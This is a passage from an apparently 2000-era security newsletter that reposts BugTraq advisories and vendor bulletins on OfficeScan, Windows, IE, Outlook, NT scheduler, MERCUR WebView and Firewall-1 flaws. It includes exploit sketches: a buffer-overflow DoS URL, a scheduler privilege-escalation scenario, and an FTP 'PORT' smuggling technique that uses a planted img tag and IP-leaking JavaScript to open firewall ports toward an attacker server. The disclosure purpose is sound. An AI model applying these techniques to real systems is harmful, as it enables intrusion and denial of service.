by correctly parsing and handling commands or arbitrary messages sent to the OfficeScan client. Trend Micro has implemented MD5 Message-Digest Algorithm to ensure that the commands between the server and the clients can not be decrypted or captured to be replayed to other clients. For details about the MD5 encryptionalgorithm see: http://theory.lcs.mit.edu/~rivest/rfc1321.txt Affected Software Versions ========================== Trend OfficeScan Corporate Edition 3.0 Trend OfficeScan Corporate Edition 3.11 Trend OfficeScan Corporate Edition 3.13 Trend OfficeScan Corporate Edition 3.5 Trend OfficeScan for Microsoft SBS 4.5 Patch Availability ================== - http://www.antivirus.com/download/ofce_patch.htm More Information ============ Please see the following references for more information related to this issue. - Trend Micro Security Bulletin: http://www.antivirus.com/download/ofce_patch_35.htm - Frequently Asked Questions: Trend Micro Knowledge Base http://solutionbank.antivirus.com/solutions/faqResult.asp?product=8 Obtaining Support on this Issue =============================== This is a fully supported release. Information on contacting Trend Micro Technical Support is available at http://www.trend.com/support/default.htm @HWA 102.0 HNS:MS Security bulletin#17 ~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ Posted @ March 17, 2000 Microsoft has released a patch that eliminates a security vulnerability in Microsoft(r) Windows(r) 95, Windows 98, and Windows 98 Second Edition. The vulnerability could cause a user's system to crash, if they attempted to access a file or folder whose path contained certain reserved words. ... MS Security bulletin#17 Posted to BugTraq on March 17, 2000 Microsoft Security Bulletin (MS00-017) -------------------------------------- Patch Available for "DOS Device in Path Name" Vulnerability Originally Posted: March 16, 2000 Summary ======= Microsoft has released a patch that eliminates a security vulnerability in Microsoft(r) Windows(r) 95, Windows 98, and Windows 98 Second Edition. The vulnerability could cause a user's system to crash, if they attempted to access a file or folder whose path contained certain reserved words. Frequently asked questions regarding this vulnerability can be foundat http://www.microsoft.com/technet/security/bulletin/fq00-017.asp. Issue ===== DOS device names are reserved words, and cannot be used as folder or file names. When parsing a reference to a file or folder, Windows correctly checks for the case in which a single DOS device name is used in the path, and treats it as invalid. However, it does not check for the case in which the path includes multiple DOS device names. When Windows attempts to interpret the device name as a file resource, it performs an illegal resource access that usually results in a crash. Because it is not possible to create files or folders that contain DOSdevice names, it would be unusual for a user to try to access one under normal circumstances. The chief threat posed by this vulnerability is that a malicious user could attempt to entice a user to attempt such an access. For instance, if a web site operator hosted a hyperlink that referenced such a path, clicking the link would result in the user's machine crashing.Likewise, a web page or HTML mail that specified a local file as the source of rendering information could cause the user's machine to crash when it was displayed. If this happened, the machine could be put back into normalservice by restarting it. Affected Software Versions ========================== - Microsoft Windows 95 - Microsoft Windows 98 - Microsoft Windows 98 Second Edition Patch Availability ================== - Windows 95: http://www.microsoft.com/downloads/release.asp?releaseID=19491 - Windows 98 and Windows 98 Second Edition: http://www.microsoft.com/downloads/release.asp?ReleaseID=19389 NOTE: Additional security patches are available at the Microsoft Download Center NOTE: The patch will be available shortly at the WindowsUpdate site. When this happens, we will modify the bulletin to provide additional information. More Information ================ Please see the following references for more information related to this issue. - Microsoft Security Bulletin MS00-017: Frequently Asked Questions, http://www.microsoft.com/technet/security/bulletin/fq00-017.asp - Microsoft Knowledge Base article Q256015 discusses this issue and will be available soon. - Microsoft TechNet Security web site, http://www.microsoft.com/technet/security/default.asp. Obtaining Support on this Issue =============================== This is a fully supported patch. Information on contacting MicrosoftTechnical Support is available at http://support.microsoft.com/support/contact/default.asp Revisions ========= - March 16, 2000: Bulletin Created. @HWA 103.0 HNS:Georgi Guninski security advisory #9 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ Posted @ March 15, 2000 There is a vulnerability in IE and Outlook 5.x for Win9x/WinNT (probablyothers) which allows executing arbitrary programs using .eml files.This may be exploited when browsing web pages or openining an email message in Outlook. ... Georgi Guninski security advisory #9 Posted to BugTraq on March 15, 2000 IE and Outlook 5.x allow executing arbitrary programs using .eml files Disclaimer: The opinions expressed in this advisory and program are my own and notof any company.The usual standard disclaimer applies, especially the fact that GeorgiGuninski is not liable for any damages caused by direct or indirect useof the information or functionality provided by this program.Georgi Guninski, bears NO responsibility for content or misuse of thisprogram or any derivatives thereof. Description: There is a vulnerability in IE and Outlook 5.x for Win9x/WinNT (probablyothers) which allows executing arbitrary programs using .eml files.This may be exploited when browsing web pages or openining an emailmessage in Outlook.This may lead to taking control over user's computer.It is also possible to read and send local files. Details: The problem is creating files in the TEMP directory with known name andarbitrary content.One may place a .chm file in the TEMP directory which contains the"shortcut" command and when the .chm file is opened with the showHelp()method programs may be executed. This vulnerability may be exploited by HTML email message in Outlook. Demonstration which starts Wordpad: http://www.nat.bg/~joro/eml.html (Note: George seems to have pulled the script, it gives a 404 now .. - Ed/Cruci) Workaround: Disable Active Scripting. Copyright 2000 Georgi Guninski 103.1 PSS:More MSIE crashing info by NtWakO ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Source: Packet Storm Security http://packetstorm,securify.com/ --[Tuesday, March 21, 2000 by NtWaK0 / biteraser]------------------------------ --[Crash ALL IE 4 / IE 5 on Windows 9x and All NT SPx with *HISTORY* Object]--- --[Tested on Win 9x IE4 IE 5 NT 4.0 SPx +IE 4 IE 5, I guess IE 3 too ?]------- Here is the story, while having a chat (IRC) with biteraser today heh, he suddenly said *fu*k* hrm... I said what is wrong He said I JUST CRASHED IE.. After some investigation it turned about to be the *HISTORY* Object :). So if you cut and past the html code in a file, then open it with IE, you will be able to see the crash. Note: key line is: , without it IEt won't crash and behavior should be #default. It can be exploited more. --[SNIP]-------------------------------------------------------------------- --- Crash ALL IE 4 ALL IE 5 on Windows 9x and All NT SPx --[SNIP]-------------------------------------------------------------------- --- NOTE: Crash Memory dump. Application exception occurred: App: exe\iexplore.dbg (pid=219) When: 3/21/2000 @ 12:52:24.60 Exception number: c0000005 (access violation) *----> System Information <----* Computer Name: INFOSEC-BRAIN User Name: Administrator Number of Processors: 1 Processor Type: x86 Family 6 Model 6 Stepping 10 Windows Version: 4.0 Current Build: 1381 Service Pack: 6 Current Type: Uniprocessor Free Registered Organization: NtWaK0 Registered Owner: NtWaK0 (00400000 - 00412000) exe\iexplore.dbg (77f60000 - 77fbe000) dll\ntdll.dbg (77f00000 - 77f5e000) dll\kernel32.dbg (77e70000 - 77ec5000) dll\user32.dbg (77ed0000 - 77efc000) dll\gdi32.dbg (77dc0000 - 77dff000) dll\advapi32.dbg (77e10000 - 77e67000) dll\rpcrt4.dbg (70bd0000 - 70c19000) SHLWAPI.dbg (71500000 - 71610000) SHDOCVW.dbg (00760000 - 007e9000) COMCTL32.dbg (77c40000 - 77d7b000) dll\shell32.dbg (71740000 - 71740000) (22000000 - 22000000) (77b20000 - 77bd7000) dll\ole32.dbg (71050000 - 71118000) BROWSEUI.dbg (717b0000 - 717b0000) (779b0000 - 779b9000) dll\linkinfo.dbg (77720000 - 77731000) dll\mpr.dbg (77a40000 - 77a4d000) dll\ntshrui.dbg (78000000 - 78040000) (77800000 - 7783a000) dll\netapi32.dbg (77840000 - 77849000) dll\NetRap.dbg (777e0000 - 777ed000) dll\samlib.dbg (65340000 - 653d2000) oleaut32.dbg (70290000 - 702fe000) URLMON.dbg (77a90000 - 77a9b000) dll\version.dbg (779c0000 - 779c8000) dll\lz32.dbg (77bf0000 - 77bf7000) dll\rpcltc1.dbg (70410000 - 70492000) MLANG.dbg (70000000 - 70242000) MSHTML.dbg (01700000 - 01772000) WININET.dbg (48080000 - 48080000) (76ab0000 - 76ab5000) dll\imm32.dbg (70f00000 - 70f1a000) dll\iepeers.dbg State Dump for Thread Id 0xd2 eax=017d1e10 ebx=00000000 ecx=70f01c28 edx=70f01ef4 esi=00000000 edi=80004005 eip=70bd1816 esp=00069688 ebp=000696a4 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000202 function: Ordinal158 70bd180d 8b542408 mov edx,[esp+0x8] ss:0129808f=???????? 70bd1811 56 push esi 70bd1812 8b742408 mov esi,[esp+0x8] ss:0129808f=???????? FAULT ->70bd1816 0fb706 movzx eax,word ptr [esi] ds:00000000=???? 70bd1819 46 inc esi 70bd181a 46 inc esi 70bd181b 83f841 cmp eax,0x41 70bd181e 7c05 jl Ordinal158+0x18 (70bd1825) 70bd1820 83f85a cmp eax,0x5a 70bd1823 7e1d jle Ordinal158+0x35 (70bd1842) 70bd1825 0fb70a movzx ecx,word ptr [edx] ds:70f01ef4=0043 70bd1828 42 inc edx 70bd1829 42 inc edx 70bd182a 83f941 cmp ecx,0x41 70bd182d 7c05 jl Ordinal158+0x27 (70bd1834) *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 000696a4 700c8078 017d1e10 00000000 0009e4cc 012c5938 SHLWAPI!Ordinal158 000696cc 700c8014 017d1e10 00000000 012c5a34 012c5938 MSHTML!ShowModalDialog 000696f4 700c7f8e 00000000 012c5a34 012c5938 00069740 MSHTML!ShowModalDialog 00069718 700c7f05 00000000 012c5938 00069740 012c5930 MSHTML!ShowModalDialog 00069744 700c7e5d 00000000 012c59ec 0000c07c 0009c07c MSHTML!ShowModalDialog 00069b60 700c7b2f 012c5930 00000000 012c5904 012c5930 MSHTML!ShowModalDialog 00069b94 700add5d 012c5930 012c5904 00001000 012c3410 MSHTML!ShowModalDialog 0006dc58 700774db 012c3410 0006dc78 0009c070 0009bb60 MSHTML!DllGetClassObject 0006dc8c 7004723f 00000003 0006dccc 012c2600 0006dcd8 MSHTML!MatchExactGetIDsOfNames 00000000 00000000 00000000 00000000 00000000 00000000 MSHTML!MatchExactGetIDsOfNames *----> Raw Stack Dump <----* 00069688 0d 18 bd 70 57 6d f0 70 - 00 00 00 00 f4 1e f0 70 ...pWm.p.......p 00069698 68 c0 09 00 00 00 00 00 - 40 97 06 00 cc 96 06 00 h.......@....... 000696a8 78 80 0c 70 10 1e 7d 01 - 00 00 00 00 cc e4 09 00 x..p..}......... 000696b8 38 59 2c 01 40 97 06 00 - 10 1e 7d 01 cc e4 09 00 8Y,.@.....}..... 000696c8 00 00 00 00 f4 96 06 00 - 14 80 0c 70 10 1e 7d 01 ...........p..}. 000696d8 00 00 00 00 34 5a 2c 01 - 38 59 2c 01 40 97 06 00 ....4Z,.8Y,.@... 000696e8 40 97 06 00 ec 59 2c 01 - 05 40 00 80 18 97 06 00 @....Y,..@...... 000696f8 8e 7f 0c 70 00 00 00 00 - 34 5a 2c 01 38 59 2c 01 ...p....4Z,.8Y,. 00069708 40 97 06 00 30 59 2c 01 - 30 59 2c 01 60 bb 09 00 @...0Y,.0Y,.`... 00069718 44 97 06 00 05 7f 0c 70 - 00 00 00 00 38 59 2c 01 D......p....8Y,. 00069728 40 97 06 00 30 59 2c 01 - ec 59 2c 01 00 00 00 00 @...0Y,..Y,..... 00069738 10 34 2c 01 00 20 0c 70 - 00 00 00 00 60 9b 06 00 .4,.. .p....`... 00069748 5d 7e 0c 70 00 00 00 00 - ec 59 2c 01 7c c0 00 0 ]~.p.....Y,.|... 00069758 7c c0 09 00 00 00 00 00 - 00 00 5c 00 43 00 72 00 |.........\.C.r. 00069768 61 00 73 00 68 00 5f 00 - 41 00 4c 00 4c 00 5f 00 a.s.h._.A.L.L._. 00069778 49 00 45 00 34 00 5f 00 - 49 00 45 00 35 00 5f 00 I.E.4._.I.E.5._. 00069788 6f 00 6e 00 5f 00 57 00 - 69 00 6e 00 64 00 6f 00 o.n._.W.i.n.d.o. 00069798 77 00 73 00 5f 00 39 00 - 78 00 5f 00 61 00 6e 00 w.s._.9.x._.a.n. 000697a8 64 00 5f 00 41 00 6c 00 - 6c 00 5f 00 4e 00 54 00 d._.A.l.l._.N.T. 000697b8 5f 00 53 00 50 00 78 00 - 5f 00 77 00 69 00 74 00 _.S.P.x._.w.i.t. State Dump for Thread Id 0xc6 eax=7ffdd000 ebx=00000000 ecx=00000001 edx=00000000 esi=00074a30 edi=000872e8 eip=77f67fa7 esp=0084fdf0 ebp=0084ff90 iopl=0 nv up ei pl nz na po nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000206 function: ZwReplyWaitReceivePort 77f67f9c b890000000 mov eax,0x90 77f67fa1 8d542404 lea edx,[esp+0x4] ss:01a7e7f7=???????? 77f67fa5 cd2e int 2e 77f67fa7 c21000 ret 0x10 77f67faa 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 0084ff90 77e15a1d 77e160f7 00074a30 0084ffec ffffffff ntdll!ZwReplyWaitReceivePort 00003a98 00000000 00000000 00000000 00000000 00000000 rpcrt4!NdrOleAllocate State Dump for Thread Id 0xee eax=77b20000 ebx=00000000 ecx=0008a2e8 edx=00000000 esi=0126ff7c edi=0008a2ec eip=77f6791f esp=0126ff68 ebp=0126ff84 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000202 function: NtDelayExecution 77f67914 b827000000 mov eax,0x27 77f67919 8d542404 lea edx,[esp+0x4] ss:0249e96f=???????? 77f6791d cd2e int 2e 77f6791f c20800 ret 0x8 77f67922 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 0126ff84 77f1cebe 0000ea60 00000000 77b489f4 0000ea60 ntdll!NtDelayExecution 0126ffec 00000000 77b4f66d 0008a2e8 00000000 00000000 kernel32!Sleep 00000000 00000000 00000000 00000000 00000000 00000000 iexplore! *----> Raw Stack Dump <----* 0126ff68 f5 ce f1 77 00 00 00 00 - 7c ff 26 01 e8 a2 08 00 ...w....|.&..... 0126ff78 00 00 00 00 00 ba 3c dc - ff ff ff ff ec ff 26 01 ......<.......&. 0126ff88 be ce f1 77 60 ea 00 00 - 00 00 00 00 f4 89 b4 77 ...w`..........w 0126ff98 60 ea 00 00 e9 f5 b4 77 - 00 00 00 00 00 00 b2 77 `......w.......w 0126ffa8 e8 a2 08 00 e8 a2 08 00 - 87 f6 b4 77 18 00 14 02 ...........w.... 0126ffb8 40 d4 06 00 de 4e f0 77 - e8 a2 08 00 18 00 14 02 @....N.w........ 0126ffc8 40 d4 06 00 e8 a2 08 00 - 40 d4 06 00 c4 ff 26 01 @.......@.....&. 0126ffd8 00 02 00 00 ff ff ff ff - 44 b9 f3 77 38 d2 f3 77 ........D..w8..w 0126ffe8 00 00 00 00 00 00 00 00 - 00 00 00 00 6d f6 b4 77 ............m..w 0126fff8 e8 a2 08 00 00 00 00 00 - 00 00 00 00 02 00 00 00 ................ 01270008 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ................ 01270018 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ................ 01270028 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ................ 01270038 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ................ 01270048 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ................ 01270058 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ................ 01270068 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ................ 01270078 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ................ 01270088 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ................ 01270098 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ................ State Dump for Thread Id 0xec eax=00000010 ebx=00000000 ecx=012c2200 edx=00000000 esi=000000a4 edi=016fff78 eip=77f682db esp=016fff5c ebp=016fff80 iopl=0 ov up ei pl nz na po cy cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000 efl=00000a07 function: NtWaitForSingleObject 77f682d0 b8c5000000 mov eax,0xc5 77f682d5 8d542404 lea edx,[esp+0x4] ss:0292e963=???????? 77f682d9 cd2e int 2e 77f682db c20c00 ret 0xc 77f682de 8bc0 mov eax,eax *----> Stack Back Trace <----* FramePtr ReturnAd Param#1 Param#2 Param#3 Param#4 Function Name 016fff80 77f04f37 000000a4 000927c0 00000000 700dcbbc ntdll!NtWaitForSingleObject 77f67610 4affc033 89257508 ff900c42 037d044a 520004c2 kernel32!WaitForSingleObject *----> Raw Stack Dump <----* 016fff5c a0 cc f1 77 a4 00 00 00 - 00 00 00 00 78 ff 6f 01 ...w........x.o. 016fff6c 00 00 00 00 10 24 2c 01 - 40 75 f6 77 00 44 5f 9a .....$,.@u.w.D_. 016fff7c fe ff ff ff 10 76 f6 77 - 37 4f f0 77 a4 00 00 00 .....v.w7O.w.... 016fff8c c0 27 09 00 00 00 00 00 - bc cb 0d 70 a4 00 00 00 .'.........p.... 016fff9c c0 27 09 00 d4 2c f9 77 - 10 24 2c 01 ec ff 6f 01 .'...,.w.$,...o. 016fffac 10 24 2c 01 ed ca 0d 70 - 50 d3 f9 77 c7 ca 0d 70 .$,....pP..w...p 016fffbc de 4e f0 77 10 24 2c 01 - d4 2c f9 77 50 d3 f9 77 .N.w.$,..,.wP..w 016fffcc 10 24 2c 01 50 d3 f9 77 - c4 ff 6f 01 54 1a 06 00 .$,.P..w..o.T... 016fffdc ff ff ff ff 44 b9 f3 77 - 38 d2 f3 77 00 00 00 00 ....D..w8..w.... 016fffec 00 00 00 00 00 00 00 00 - be ca 0d 70 10 24 2c 01 ...........p.$,. 016ffffc 00 00 00 00 4d 5a 90 00 - 03 00 00 00 04 00 00 00 ....MZ.......... 0170000c ff ff 00 00 b8 00 00 00 - 00 00 00 00 40 00 00 00 ............@... 0170001c 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ................ 0170002c 00 00 00 00 00 00 00 00 - 00 00 00 00 00 00 00 00 ................ 0170003c c0 00 00 00 0e 1f ba 0e - 00 b4 09 cd 21 b8 01 4c ............!..L 0170004c cd 21 54 68 69 73 20 70 - 72 6f 67 72 61 6d 20 63 .!This program c 0170005c 61 6e 6e 6f 74 20 62 65 - 20 72 75 6e 20 69 6e 20 annot be run in 0170006c 44 4f 53 20 6d 6f 64 65 - 2e 0d 0d 0a 24 00 00 00 DOS mode....$... 0170007c 00 00 00 00 63 c9 86 b7 - 27 a8 e8 e4 27 a8 e8 e4 ....c...'...'... 0170008c 27 a8 e8 e4 27 a8 e9 e4 - cb a8 e8 e4 7e 8b fb e4 '...'.......~... --[END]--------------------------------------------------------------------- --- Cheers, |-+-||-+-|-+-|-+-|oOo-(NtWaK0)(Telco. Eng. Etc..)-oOo|-+-|-+-|-+-||-+-| The only secure computer is one that's unplugged, locked in a safe, and buried 20 feet under the ground in a secret location... and i'm not even too sure about that one"--Dennis Huges, FBI. |-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-|-+-||-+-||-+-| Live Well Do Good --:) Cheers, ------|oOo-(NtWaK0)(Telco. Eng. InfoSec Senior, Etc..)-oOo|------ The only secure computer is one that's unplugged, locked in a safe, and buried 20 feet under the ground in a secret location... and i'm not even too sure about that one"--Dennis Huges, FBI. ----------------------------------------------------------------- Live Well Do Good --:) @HWA 104.0 HNS:Drive Mappings in Interactive Login ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ Posted @ March 15, 2000 Issue: Drive Mappings in Interactive Login affect Processes running in context of Schedule User. Points indicating this is a bug/security exploit and not by design (as somehave indicated to the author) ... Drive Mappings in Interactive Login Posted to BugTraq on March 15, 2000 Issue: Drive Mappings in Interactive Login affect Processes running in context of Schedule User. Points indicating this is a bug/security exploit and not by design (as somehave indicated to me) 1. Drive mappings are individual to each user, as seen by their location in the registry under HKCU\Network. This point alone indicates a bug. Why should the *personal* drive mappings of an interactive login session have *any* affect on a service running in a different user context, in a supposedly secure environment? They shouldn't, plain and simple. 2. KB Article Q130668 is the only article I could find which has any relationship to this issue, but it deals with a "bug" when the drives are mapped to Netware Volumes using GSNW. However, reading between the lines, one can see that the behavior described (which is identical in both Netware and NT drive mappings) is not by design, otherwise, why would they state this: Microsoft has confirmed this to be a problem in Windows NT Workstation and Server versions 3.5, 3.51, and 4.0... They do offer up a solution to one half of the problem - that is when the scheduled process leaves a mapped drive, which then affects any interactive processes by preventing the use of this drive (unless appropriate permissions exist for the interactive user). But they make no mention of the other half - that a non- privileged user can affect the environment of the scheduled process, which is often in a priviliged account context. Take the following scenario: A "secure" NT workstation is configured with scheduler running in a user context that has specific elevated rights in order to perform unattended administrative functions based on scripts that are stored on a server. But one of the tasks performed in these scripts requires a mapped drive letter; UNC paths won't work. So to be sure, the scripts begins by mapping a drive letter to the shared network resource containing the patches and updates placed there when required. Often these patches are security fixes and the like, and the scheduler dutifully applies them to some large number of machines as directed in the script. Here comes the exploit. If an interactive login is present, and the same drive letter is already mapped by a user, the net use in the scheduled script will fail, as will the required hotfix or update. Not a pretty picture in a large LAN whose security and stability may rely on timely installation of these updates. This is the simplest "exploit". Next we extend this a bit further: the user maps a drive letter in an interactive login, and places in it a script with the same filename as that called by the scheduled update, and makes sure the schedule user has permissions to this file and network resource. All of this could be performed by a non- privileged user. The schedule service will now execute this script in the elevated user context, and the script could be instructed to install a trojan, add the user to the local Admin group, or whatever. The bottom line is that this design flaw can be easily exploited to allow any user with interactive login rights to a workstation to elevate himself to the rights of the schedule user, which is often Administrator of the workstation. I have tested this on NT4 SP5 and 6a. (Note this is without IE5 installed, just the built in AT scheduler). I have also tested this with all combinations of Local and Domain accounts for both the scheduler and the interactive user. I have tested it with and without persistent drive mappings present for either user - in each case, whoever gets the login first gets the drive letter. @HWA 105.0 HNS:DoS Attack in MERCUR WebView ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ Posted @ March 15, 2000 UssrLabs found a buffer overflow in MERCUR WebView WebMail-Client 1.0where they do not use proper bounds checking in the code who handle the GETcommands The following all result in a Denial of Service against the service in question. ... DoS Attack in MERCUR WebView Posted to BugTraq on March 15, 2000 USSR Advisory Code: USSR-2000036 Release Date: March 16, 2000 Systems Affected: MERCUR WebMail-Client Version 1.0 port (1080) THE PROBLEM UssrLabs found a buffer overflow in MERCUR WebView WebMail-Client 1.0where they do not use proper bounds checking in the code who handle the GETcommands The following all result in a Denial of Service against the servicein question. Example: http://hostip:1080/mmain.html&mail_user=(buffer) Where [buffer] is aprox. 1000 characters. (0) Binary or source for this Exploit: http://www.ussrback.com/ Exploit: the Exploit, crash the remote machine service WebMail Vendor Status: informed Vendor Url: http://www.atrium-software.com Program Url: http://www.atrium-software.com/mercur/webview_e.html Credit: USSRLABS SOLUTION Noting yet. @HWA 106.0 HNS:Problem with Firewall-1 ~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ Posted @ March 15, 2000 The Dartmouth Collage security group has uncovered a problem withFirewall-1 which could lead to the protected site handing out more IPaddress info than intended. .. Problem with Firewall-1 Posted to BugTraq on March 15, 2000 The Dartmouth Collage security group has uncovered a problem withFirewall-1 which could lead to the protected site handing out more IPaddress info than intended. Under certain nominal load conditions (CPU less than 40%, 200+ activesessions) Firewall-1 will begin "leaking" packets with their privateaddress information in tact. The result is that the receiving site willreceive a SYN=1 that it will be unable to respond to. Once the clientattempts a resend, the target network (or anyone in the middle) can usethe source port information to enumerate the client's true IP address. Here is a Snort trace which has been sanitized and formatted for easierviewing: Mar 9 14:01:19 172.30.1.10:1721 -> 192.168.1.5:80 SYN **S***** Mar 9 14:01:48 200.200.200.5:1721 -> 192.168.1.5:80 SYN **S***** Mar 9 14:04:35 172.30.1.10:1858 -> 192.168.1.5:80 SYN **S***** Mar 9 14:05:05 200.200.200.5:1858 -> 192.168.1.5:80 SYN **S***** Mar 9 14:23:25 172.16.5.20:4868 -> 192.168.1.5:80 SYN **S***** Mar 9 14:23:51 200.200.200.5:4868 -> 192.168.1.5:80 SYN **S***** So the first packet goes out with the private address information stillin place and SYN=1. When the client does not receive a reply, itretransmits the SYN=1. Since FW-1 considers this to be part of the samesession, the same source port number is assigned. If the second packetgets translated properly (as in these traces) the source port info canpotentially be used to map the legal IP address to the private address. Of course the problem here is that a would be bad guy now knows theclient's true IP address. If enough hosts are recorded, its possiblethat most of the internal network address space could be enumerated. This problem has been noted on Firewall-1 versions 3.0b & 4.0. 4.1 hasnot been checked but its expected that the same problem may exist. Wewhere able to reproduce the problem on a Nokia IP440 and NT. I've seenthis problem on Solaris 2.6 as well, but do not have the data to back upthe statement. A quick fix is to apply egress filtering to the border router and blockall private addressing that attempts to leak though. A how-to on egresscan be found at: http://www.sans.org/y2k/egress.htm Cheers all, Chris @HWA. 107.0 HNS:Freeze Distribution of IE 5.0, 5.0a, and 5.0b ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ Posted @ March 15, 2000 Microsoft has just discovered a serious problem when a user attempts toinstall the 128-bit security patch for Internet Explorer 5.0, 5.0a and5.0b on Windows 2000 as part of an IE5.0 IEAK package. After restartingthe system, users will not be able to logon to Windows 2000 ... Freeze Distribution of IE 5.0, 5.0a, and 5.0b Posted to BugTraq on March 15, 2000 Microsoft has just discovered a serious problem when a user attempts toinstall the 128-bit security patch for Internet Explorer 5.0, 5.0a and5.0b on Windows 2000 as part of an IE5.0 IEAK package. After restartingthe system, users will not be able to logon to Windows 2000. The instructions to incorporate the 128-bit security patch into IEAKpackages say you should use the command line switches: "/q:a /r:n /n:v" The /n:v switch when used with ie5dom.exe (the 128-bit security patch for5.0x) causes important security files on Windows 2000 to be replaced witholder files, preventing users from logging on. Installations created using IEAK 5.0 for Windows 95, Windows 98, andWindows NT4 systems with the ie5dom.exe, and these command line parametersspecified, are not affected. It is critical that you freeze distribution of IE 5.0, 5.0a or 5.0b buildsthat incorporate the 128-bit security patch with these switches. Pleasetake immediate action to help prevent more customers from encounteringthis issue. Please checkhttp://www.microsoft.com/windows/ieak/en/support /faq/default.asp andMicrosoft Knowledge Base (KB) article Q255669 for updates to this issue. Note: It may take 24 hours from the original issuance of this bulletin forthe Microsoft Knowledge Base (KB) article related to this issue to bevisible. We sincerely apologize for this inconvenience and thank you in advance foryour help in protecting end users. Thank you, The IEAK Product Team Checking to see if you have included this command-line switch: To check a package for this issue: Open your IEAK package in the IEAK Wizard and go to the Custom Componentsscreen. Examine each custom component. If you have included ie5dom.exe asa custom component, check the command line switches for '/R:N /Q:A /N:V' *OR* If you don't have the IEAK Wizard available to you: 1) Extract your custom IE 5.0x package by running this command line:'ie5setup.exe /c /t:' 2) Browse to the directory. Open 'iesetup.cif' in Notepad. 3) Look for a section like this: [CUSTOM0] SectionType=Component DisplayName='128-bit Security' URL1='Ie5dom.exe',2 GUID=128PATCH Command1='Ie5dom.exe' Switches1='/R:N /Q:A /N:V' Type1=2 UninstallKey='' Version= Size=216 Platform=win95,win98,nt4,nt5, Modes='0,1,2' Details='128-bit Securiy' Group=CustItems Priority=500 UIVisible=0 4) Examine for: Switches1='/R:N /Q:A /N:V' If you have this switch listed, immediately freeze distribution of thispackage!!! @HWA 108.0 HNS:Extending the FTP "ALG" vulnerability ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNS http://www.net-security.org/ Posted @ March 15, 2000 It is possible to cause many firewalls to open arbitrary ports allowing external hosts to connect to "protected" clients. In this case, it is done by fooling the protected client into sending a specially crafted FTP request through the firewall, which it misinterprets as a legitimate FTP "PORT" command ... Extending the FTP "ALG" vulnerability Posted to BugTraq on March 15, 2000 Author: Mikael Olsson, EnterNet Sweden mikael.olsson@enternet.se Original Date: 2000-03-10 Originally posted to: Bugtraq, Vuln-dev (BID 1045) Vendor contacted: Nope, sorry, too many. Updated: 2000-03-14 - Added browser-specific info - Begun writing a list of firewalls expected to be vulnerable - Rewrote a couple of paragraphs that were causing much head scratching Synopsis It is possible to cause many firewalls to open arbitrary ports allowing external hosts to connect to "protected" clients. In this case, it is done by fooling the protected client into sending a specially crafted FTP request through the firewall, which it misinterprets as a legitimate FTP "PORT" command. Basic idea : how to open arbitrary ports against a client * Send a HTML email to an HTML-enabled mail reader containing the tag You could also conceivably plant a web page somewhere on a server containing this link. Please reference CERT advisory CA-2000-02: Malicious HTML Tags Embedded in Client Web Requests http://www.cert.org/advisories/CA-2000-02.html * Balance the number of A so that the PORT command will begin on a new packet boundary. This may also be done by having the server use a low TCP MSS to decrease the number of A's that one has to add. * The firewall in question will incorrectly parse the resulting RETR /aaaaaaaa[....]aaaaaPORT 1,2,3,4,0,139 as first a RETR command and then a PORT command and open port 139 against your address (1.2.3.4 in this case) * Now the server ftp.rooted.com can connect to the client on port 139. Ouch. Before you ask: No, it does not have to be port 139. It can be any port. Some firewalls disallow "known server ports" for these connections; such ports cannot be used, but I'm betting there are plenty other ports that can be used in such cases. Address translation playing games You have to know the IP address of the client in order to fool the firewall into opening the port. If the client is not dynamically NATed, this is easy. If the client IS dynamically NATed, this is a bit harder. How to make it work through address translation There are several ways to figure out what the private address is. Here's two: * Send an email to the address in question containing an img src ftp://ftp.rooted.com:23456 and hope that the firewall won't realise that port 23456 is FTP. PORT commands won't be translated this way, so the private IP adress will be exposed. This assumes that 23456 is allowed through the firewall and that it won't attempt to parse FTP command data on that port. * Send an email with a link to a web page that contains javascript that extracts the private IP address and posts it to the server. The javascript code below works on Netscape; I don't know what the equivalent is for MSIE. vartool=java.awt.Toolkit.getDefaultToolkit(); addr=java.net.InetAddress.getLocalHost(); ip=addr.getHostAddress(); Once we know about the IP address, we can adjust the img src so that it is valid for that specific internal client. The dynamic translation will also likely change the port number opened on the NAT:ed public address, but that's ok. All we have to do is have our fake FTP server read the command packet containing the PORT command, as changed by the firewall, and we'll know what public address and port to connect to in order to get to our desired port on the "protected" client. I think I've heard about reverse firewall penetration before Yeah, the idea of 